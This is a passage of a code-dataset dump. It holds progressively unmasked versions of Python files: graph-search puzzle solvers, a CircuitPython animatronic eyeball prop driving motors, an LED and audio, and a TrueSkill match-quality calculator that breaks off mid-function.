r\n\n#__________________________________________________________________________________\n\ndef fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):\n shortest = nx.shortest_path(graph,robot,target)\n score = -len(shortest) - num_of_moves\n\n for obstacle in obstacles:\n if obstacle in shortest:\n score = score - 1\n\n return -score\n\n\n\ndef solve_heap(o,r,graph,t):\n round = 0\n visited = set([])\n queue= [(-1000,[],o,r)]\n while queue:\n score,moves,obstacles,robot = heap.heappop(queue)\n obstacles.sort()\n st = ('#'.join(obstacles),robot)\n if ( st not in visited ):\n visited.add(st)\n score = fitness_fun_heap(graph,obstacles,robot,t,len(moves))\n pm = possible_moves(obstacles,robot,graph)\n\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles,newrobot = make_moves(obstacles,robot,graph,[move])\n if t == newrobot:\n print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n return new_moves\n\n round = round+1\n if (round % 100000 == 0):\n print (\"Visited = \" + str(len(visited)))\n heap.heappush(queue,(score,new_moves,newobstacles,newrobot))\n\n\n\n\n\ndef solve_brute_force(o,r,graph,t):\n num_of_solutions = 0\n all_solutions = []\n\n round = 0\n visited = set([])\n queue = [([],o,r)]\n while queue:\n moves,obstacles,robot = queue.pop(0)\n obstacles.sort()\n st = ('#'.join(obstacles),robot)\n if ( st not in visited ):\n visited.add(st)\n\n pm = possible_moves(obstacles,robot,graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles,newrobot = make_moves(obstacles,robot,graph,[move])\n if t == newrobot:\n all_solutions.append(new_moves)\n\n round = round+1\n\n if (round % 100000 == 0):\n print (\"Visited = \" + str(len(visited)))\n queue.append((new_moves,newobstacles,newrobot))\n\n\n print('Number of solutions: ' + str(len(all_solutions)))\n\n best = min(all_solutions, key = lambda x : len(x))\n\n return best\n",
"step-ids": [
7,
11,
12,
16,
19
]
}
|
[
7,
11,
12,
16,
19
] |
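The solve_heap routine in the row above is a best-first search: candidate states go onto a binary heap keyed by a fitness score, and revisits are pruned by hashing each state as the pair ('#'.join(sorted obstacles), robot). A minimal, self-contained sketch of that pattern follows; the expand, score, and is_goal callables are illustrative stand-ins invented here, not the puzzle's own functions.

import heapq

def best_first(start, expand, score, is_goal):
    # Generic best-first search: expand(state) yields successor states,
    # score(state) returns a priority (lower is better), states are hashable.
    seen = set()
    counter = 0  # tie-breaker so the heap never has to compare states directly
    heap = [(score(start), counter, start, [])]
    while heap:
        _, _, state, path = heapq.heappop(heap)
        if state in seen:
            continue
        seen.add(state)
        if is_goal(state):
            return path
        for nxt in expand(state):
            if nxt not in seen:
                counter += 1
                heapq.heappush(heap, (score(nxt), counter, nxt, path + [nxt]))
    return None

# Toy usage: reach 7 from 0 on a number line with steps of -1, +1, or +3.
print(best_first(0, lambda s: (s - 1, s + 1, s + 3),
                 lambda s: abs(7 - s), lambda s: s == 7))  # [3, 6, 7]

The counter is the usual heapq trick when payloads are not orderable; in the row's code the (score, moves, obstacles, robot) tuples happen to be comparable, which works, but it makes heap behaviour depend on the ordering of the move lists whenever scores tie.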
<|reserved_special_token_0|>
def open_lid():
motor_lid.throttle = 1
time.sleep(0.25)
motor_lid.throttle = 0
def close_lid():
motor_lid.throttle = -1
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ss.pin_mode(button, ss.INPUT_PULLUP)
<|reserved_special_token_0|>
ss.pin_mode(LED, ss.OUTPUT)
<|reserved_special_token_0|>
ss.pin_mode(attract_switch, ss.INPUT_PULLUP)
<|reserved_special_token_0|>
def open_lid():
motor_lid.throttle = 1
time.sleep(0.25)
motor_lid.throttle = 0
def close_lid():
motor_lid.throttle = -1
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
def eye_look():
motor_eye.throttle = random.uniform(0.6, 1.0)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
motor_eye.throttle = random.uniform(-1.0, -0.6)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
while True:
if ss.digital_read(attract_switch):
if not ss.digital_read(button):
decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))
audio.play(decoder)
while audio.playing:
pass
open_lid()
blink(3)
ss.digital_write(LED, True)
decoder = audiomp3.MP3Decoder(open(audio_files[
current_audio_file], 'rb'))
audio.play(decoder)
while audio.playing:
eye_look()
motor_eye.throttle = 0
blink(5)
close_lid()
current_audio_file = (current_audio_file + 1) % len(audio_files)
else:
open_lid()
blink(3)
ss.digital_write(LED, True)
for _ in range(4):
eye_look()
time.sleep(1)
blink(5)
close_lid()
time.sleep(random.randint(2, 8))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ss = crickit.seesaw
button = crickit.SIGNAL1
ss.pin_mode(button, ss.INPUT_PULLUP)
LED = crickit.SIGNAL4
ss.pin_mode(LED, ss.OUTPUT)
attract_switch = crickit.SIGNAL8
ss.pin_mode(attract_switch, ss.INPUT_PULLUP)
audio = audiopwmio.PWMAudioOut(board.A0)
audio_files = ['phrase_01.mp3', 'phrase_02.mp3', 'phrase_03.mp3']
current_audio_file = 0
motor_eye = crickit.dc_motor_1
motor_lid = crickit.dc_motor_2
def open_lid():
motor_lid.throttle = 1
time.sleep(0.25)
motor_lid.throttle = 0
def close_lid():
motor_lid.throttle = -1
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
def eye_look():
motor_eye.throttle = random.uniform(0.6, 1.0)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
motor_eye.throttle = random.uniform(-1.0, -0.6)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
while True:
if ss.digital_read(attract_switch):
if not ss.digital_read(button):
decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))
audio.play(decoder)
while audio.playing:
pass
open_lid()
blink(3)
ss.digital_write(LED, True)
decoder = audiomp3.MP3Decoder(open(audio_files[
current_audio_file], 'rb'))
audio.play(decoder)
while audio.playing:
eye_look()
motor_eye.throttle = 0
blink(5)
close_lid()
current_audio_file = (current_audio_file + 1) % len(audio_files)
else:
open_lid()
blink(3)
ss.digital_write(LED, True)
for _ in range(4):
eye_look()
time.sleep(1)
blink(5)
close_lid()
time.sleep(random.randint(2, 8))
<|reserved_special_token_1|>
import time
import random
import board
import audiomp3
import audiopwmio
from adafruit_crickit import crickit
ss = crickit.seesaw
button = crickit.SIGNAL1
ss.pin_mode(button, ss.INPUT_PULLUP)
LED = crickit.SIGNAL4
ss.pin_mode(LED, ss.OUTPUT)
attract_switch = crickit.SIGNAL8
ss.pin_mode(attract_switch, ss.INPUT_PULLUP)
audio = audiopwmio.PWMAudioOut(board.A0)
audio_files = ['phrase_01.mp3', 'phrase_02.mp3', 'phrase_03.mp3']
current_audio_file = 0
motor_eye = crickit.dc_motor_1
motor_lid = crickit.dc_motor_2
def open_lid():
motor_lid.throttle = 1
time.sleep(0.25)
motor_lid.throttle = 0
def close_lid():
motor_lid.throttle = -1
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
def eye_look():
motor_eye.throttle = random.uniform(0.6, 1.0)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
motor_eye.throttle = random.uniform(-1.0, -0.6)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
while True:
if ss.digital_read(attract_switch):
if not ss.digital_read(button):
decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))
audio.play(decoder)
while audio.playing:
pass
open_lid()
blink(3)
ss.digital_write(LED, True)
decoder = audiomp3.MP3Decoder(open(audio_files[
current_audio_file], 'rb'))
audio.play(decoder)
while audio.playing:
eye_look()
motor_eye.throttle = 0
blink(5)
close_lid()
current_audio_file = (current_audio_file + 1) % len(audio_files)
else:
open_lid()
blink(3)
ss.digital_write(LED, True)
for _ in range(4):
eye_look()
time.sleep(1)
blink(5)
close_lid()
time.sleep(random.randint(2, 8))
<|reserved_special_token_1|>
# SPDX-FileCopyrightText: 2021 John Park for Adafruit Industries
# SPDX-License-Identifier: MIT
import time
import random
import board
import audiomp3
import audiopwmio
from adafruit_crickit import crickit
ss = crickit.seesaw # Crickit seesaw setup
button = crickit.SIGNAL1 # momentary switch to trigger animation
ss.pin_mode(button, ss.INPUT_PULLUP)
LED = crickit.SIGNAL4 # standard LED for eyeball lighting
ss.pin_mode(LED, ss.OUTPUT)
attract_switch = crickit.SIGNAL8 # attract mode switch or jumper
ss.pin_mode(attract_switch, ss.INPUT_PULLUP)
audio = audiopwmio.PWMAudioOut(board.A0) # Feather outputs this pin to Crickit amplifier
audio_files = [ # use your own mono .mp3 files
"phrase_01.mp3",
"phrase_02.mp3",
"phrase_03.mp3"
]
current_audio_file = 0
# two motors
motor_eye = crickit.dc_motor_1
motor_lid = crickit.dc_motor_2
def open_lid():
motor_lid.throttle = 1 # full speed open
time.sleep(0.25)
motor_lid.throttle = 0 # hold
def close_lid():
motor_lid.throttle = -1 # full speed closed
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
def eye_look():
motor_eye.throttle = random.uniform(0.6, 1.0)
time.sleep(random.random()) # 0 to 1.0 seconds
motor_eye.throttle = 0
time.sleep(random.random())
motor_eye.throttle = random.uniform(-1.0, -0.6)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
while True:
    if ss.digital_read(attract_switch): # regular mode, attract switch not closed/shorted
if not ss.digital_read(button): # button has been pressed
decoder = audiomp3.MP3Decoder(open("ring.mp3", "rb"))
audio.play(decoder)
while audio.playing:
pass
open_lid()
blink(3)
ss.digital_write(LED, True) # light the eye
decoder = audiomp3.MP3Decoder(open(audio_files[current_audio_file], "rb"))
audio.play(decoder)
while audio.playing:
eye_look()
motor_eye.throttle = 0 # audio is finished, pause the eye
blink(5)
close_lid()
current_audio_file = ((current_audio_file + 1) % (len(audio_files))) # go to next file
else: # attract mode
open_lid()
blink(3)
ss.digital_write(LED, True)
for _ in range(4):
eye_look()
time.sleep(1)
blink(5)
close_lid()
time.sleep(random.randint(2, 8))
|
flexible
|
{
"blob_id": "608c116cd42132bd63be5056f0aaf5c78933886e",
"index": 7536,
"step-1": "<mask token>\n\n\ndef open_lid():\n motor_lid.throttle = 1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef close_lid():\n motor_lid.throttle = -1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\n\n<mask token>\n",
"step-2": "<mask token>\nss.pin_mode(button, ss.INPUT_PULLUP)\n<mask token>\nss.pin_mode(LED, ss.OUTPUT)\n<mask token>\nss.pin_mode(attract_switch, ss.INPUT_PULLUP)\n<mask token>\n\n\ndef open_lid():\n motor_lid.throttle = 1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef close_lid():\n motor_lid.throttle = -1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\n\ndef eye_look():\n motor_eye.throttle = random.uniform(0.6, 1.0)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n motor_eye.throttle = random.uniform(-1.0, -0.6)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n\n\nwhile True:\n if ss.digital_read(attract_switch):\n if not ss.digital_read(button):\n decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))\n audio.play(decoder)\n while audio.playing:\n pass\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n decoder = audiomp3.MP3Decoder(open(audio_files[\n current_audio_file], 'rb'))\n audio.play(decoder)\n while audio.playing:\n eye_look()\n motor_eye.throttle = 0\n blink(5)\n close_lid()\n current_audio_file = (current_audio_file + 1) % len(audio_files)\n else:\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n for _ in range(4):\n eye_look()\n time.sleep(1)\n blink(5)\n close_lid()\n time.sleep(random.randint(2, 8))\n",
"step-3": "<mask token>\nss = crickit.seesaw\nbutton = crickit.SIGNAL1\nss.pin_mode(button, ss.INPUT_PULLUP)\nLED = crickit.SIGNAL4\nss.pin_mode(LED, ss.OUTPUT)\nattract_switch = crickit.SIGNAL8\nss.pin_mode(attract_switch, ss.INPUT_PULLUP)\naudio = audiopwmio.PWMAudioOut(board.A0)\naudio_files = ['phrase_01.mp3', 'phrase_02.mp3', 'phrase_03.mp3']\ncurrent_audio_file = 0\nmotor_eye = crickit.dc_motor_1\nmotor_lid = crickit.dc_motor_2\n\n\ndef open_lid():\n motor_lid.throttle = 1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef close_lid():\n motor_lid.throttle = -1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\n\ndef eye_look():\n motor_eye.throttle = random.uniform(0.6, 1.0)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n motor_eye.throttle = random.uniform(-1.0, -0.6)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n\n\nwhile True:\n if ss.digital_read(attract_switch):\n if not ss.digital_read(button):\n decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))\n audio.play(decoder)\n while audio.playing:\n pass\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n decoder = audiomp3.MP3Decoder(open(audio_files[\n current_audio_file], 'rb'))\n audio.play(decoder)\n while audio.playing:\n eye_look()\n motor_eye.throttle = 0\n blink(5)\n close_lid()\n current_audio_file = (current_audio_file + 1) % len(audio_files)\n else:\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n for _ in range(4):\n eye_look()\n time.sleep(1)\n blink(5)\n close_lid()\n time.sleep(random.randint(2, 8))\n",
"step-4": "import time\nimport random\nimport board\nimport audiomp3\nimport audiopwmio\nfrom adafruit_crickit import crickit\nss = crickit.seesaw\nbutton = crickit.SIGNAL1\nss.pin_mode(button, ss.INPUT_PULLUP)\nLED = crickit.SIGNAL4\nss.pin_mode(LED, ss.OUTPUT)\nattract_switch = crickit.SIGNAL8\nss.pin_mode(attract_switch, ss.INPUT_PULLUP)\naudio = audiopwmio.PWMAudioOut(board.A0)\naudio_files = ['phrase_01.mp3', 'phrase_02.mp3', 'phrase_03.mp3']\ncurrent_audio_file = 0\nmotor_eye = crickit.dc_motor_1\nmotor_lid = crickit.dc_motor_2\n\n\ndef open_lid():\n motor_lid.throttle = 1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef close_lid():\n motor_lid.throttle = -1\n time.sleep(0.25)\n motor_lid.throttle = 0\n\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\n\ndef eye_look():\n motor_eye.throttle = random.uniform(0.6, 1.0)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n motor_eye.throttle = random.uniform(-1.0, -0.6)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n\n\nwhile True:\n if ss.digital_read(attract_switch):\n if not ss.digital_read(button):\n decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))\n audio.play(decoder)\n while audio.playing:\n pass\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n decoder = audiomp3.MP3Decoder(open(audio_files[\n current_audio_file], 'rb'))\n audio.play(decoder)\n while audio.playing:\n eye_look()\n motor_eye.throttle = 0\n blink(5)\n close_lid()\n current_audio_file = (current_audio_file + 1) % len(audio_files)\n else:\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n for _ in range(4):\n eye_look()\n time.sleep(1)\n blink(5)\n close_lid()\n time.sleep(random.randint(2, 8))\n",
"step-5": "# SPDX-FileCopyrightText: 2021 John Park for Adafruit Industries\n# SPDX-License-Identifier: MIT\nimport time\nimport random\nimport board\nimport audiomp3\nimport audiopwmio\nfrom adafruit_crickit import crickit\n\nss = crickit.seesaw # Crickit seesaw setup\n\nbutton = crickit.SIGNAL1 # momentary switch to trigger animation\nss.pin_mode(button, ss.INPUT_PULLUP)\n\nLED = crickit.SIGNAL4 # standard LED for eyeball lighting\nss.pin_mode(LED, ss.OUTPUT)\n\nattract_switch = crickit.SIGNAL8 # attract mode switch or jumper\nss.pin_mode(attract_switch, ss.INPUT_PULLUP)\n\naudio = audiopwmio.PWMAudioOut(board.A0) # Feather outputs this pin to Crickit amplifier\naudio_files = [ # use your own mono .mp3 files\n \"phrase_01.mp3\",\n \"phrase_02.mp3\",\n \"phrase_03.mp3\"\n]\ncurrent_audio_file = 0\n\n# two motors\nmotor_eye = crickit.dc_motor_1\nmotor_lid = crickit.dc_motor_2\n\ndef open_lid():\n motor_lid.throttle = 1 # full speed open\n time.sleep(0.25)\n motor_lid.throttle = 0 # hold\n\ndef close_lid():\n motor_lid.throttle = -1 # full speed closed\n time.sleep(0.25)\n motor_lid.throttle = 0\n\ndef blink(times):\n for _ in range(times):\n ss.digital_write(LED, True)\n time.sleep(0.1)\n ss.digital_write(LED, False)\n time.sleep(0.1)\n\ndef eye_look():\n motor_eye.throttle = random.uniform(0.6, 1.0)\n time.sleep(random.random()) # 0 to 1.0 seconds\n motor_eye.throttle = 0\n time.sleep(random.random())\n motor_eye.throttle = random.uniform(-1.0, -0.6)\n time.sleep(random.random())\n motor_eye.throttle = 0\n time.sleep(random.random())\n\n\n\nwhile True:\n if ss.digital_read(attract_switch): # regular mode, attrack switch not closed/shorted\n if not ss.digital_read(button): # button has been pressed\n decoder = audiomp3.MP3Decoder(open(\"ring.mp3\", \"rb\"))\n audio.play(decoder)\n while audio.playing:\n pass\n open_lid()\n blink(3)\n ss.digital_write(LED, True) # light the eye\n decoder = audiomp3.MP3Decoder(open(audio_files[current_audio_file], \"rb\"))\n audio.play(decoder)\n while audio.playing:\n eye_look()\n motor_eye.throttle = 0 # audio is finished, pause the eye\n blink(5)\n close_lid()\n current_audio_file = ((current_audio_file + 1) % (len(audio_files))) # go to next file\n\n else: # attract mode\n open_lid()\n blink(3)\n ss.digital_write(LED, True)\n for _ in range(4):\n eye_look()\n time.sleep(1)\n blink(5)\n close_lid()\n time.sleep(random.randint(2, 8))\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
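The row above only runs on a Feather wired to a Crickit, so a quick way to sanity-check its timing logic off-device is to stand in for the seesaw object. A minimal hardware-free sketch, assuming no real board is attached: FakeSeesaw and the placeholder LED pin id below are invented for illustration and are not part of adafruit_crickit.

import time

class FakeSeesaw:
    # Records (timestamp, pin, level) instead of toggling real GPIO.
    def __init__(self):
        self.events = []
    def digital_write(self, pin, level):
        self.events.append((time.monotonic(), pin, level))

LED = 4  # placeholder pin id for the sketch
ss = FakeSeesaw()

def blink(times):  # same body as the prop's blink()
    for _ in range(times):
        ss.digital_write(LED, True)
        time.sleep(0.1)
        ss.digital_write(LED, False)
        time.sleep(0.1)

blink(3)
assert len(ss.events) == 6  # three on/off pairs, roughly 0.1 s apart
print(ss.events)

The same stub approach covers the two motors: fake objects exposing a throttle attribute let eye_look() and the lid moves run under desktop Python.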
<|reserved_special_token_0|>
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(
SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,
atLeast(2), atLeast(1))
<|reserved_special_token_0|>
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(
teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix
.transpose)
betaSquared = gameInfo.beta ** 2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *
playerTeamAssignmentsMatrix)
aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *
playerTeamAssignmentsMatrix)
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = start * middleInverse * end * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = e ** expPart * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda
rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(
teamAssignmentsList, lambda rating: rating.standardDeviation **
2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(
SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,
atLeast(2), atLeast(1))
<|reserved_special_token_0|>
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(
teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix
.transpose)
betaSquared = gameInfo.beta ** 2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *
playerTeamAssignmentsMatrix)
aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *
playerTeamAssignmentsMatrix)
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = start * middleInverse * end * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = e ** expPart * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda
rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(
teamAssignmentsList, lambda rating: rating.standardDeviation **
2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,
totalPlayers):
playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(
currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(
nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1,
playerAssignments)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(
SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,
atLeast(2), atLeast(1))
def calculateNewRatings(self, gameInfo, teams, teamRanks):
argumentNotNone(gameInfo, 'gameInfo')
self._validateTeamCountAndPlayersCountPerTeam(teams)
teams, teamRanks = sortByRank(teams, teamRanks)
factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)
factorGraph.buildGraph()
factorGraph.runSchedule()
return factorGraph.getUpdatedRatings()
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(
teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix
.transpose)
betaSquared = gameInfo.beta ** 2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *
playerTeamAssignmentsMatrix)
aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *
playerTeamAssignmentsMatrix)
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = start * middleInverse * end * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = e ** expPart * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda
rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(
teamAssignmentsList, lambda rating: rating.standardDeviation **
2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,
totalPlayers):
playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(
currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(
nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1,
playerAssignments)
<|reserved_special_token_1|>
from layers import TrueSkillFactorGraph
from math import e, sqrt
from numerics import atLeast, _Vector, _DiagonalMatrix, Matrix
from objects import SkillCalculator, SupportedOptions, argumentNotNone, getPartialPlayPercentage, sortByRank
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(
SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,
atLeast(2), atLeast(1))
def calculateNewRatings(self, gameInfo, teams, teamRanks):
argumentNotNone(gameInfo, 'gameInfo')
self._validateTeamCountAndPlayersCountPerTeam(teams)
teams, teamRanks = sortByRank(teams, teamRanks)
factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)
factorGraph.buildGraph()
factorGraph.runSchedule()
return factorGraph.getUpdatedRatings()
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(
teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix
.transpose)
betaSquared = gameInfo.beta ** 2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *
playerTeamAssignmentsMatrix)
aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *
playerTeamAssignmentsMatrix)
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = start * middleInverse * end * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = e ** expPart * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda
rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(
teamAssignmentsList, lambda rating: rating.standardDeviation **
2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,
totalPlayers):
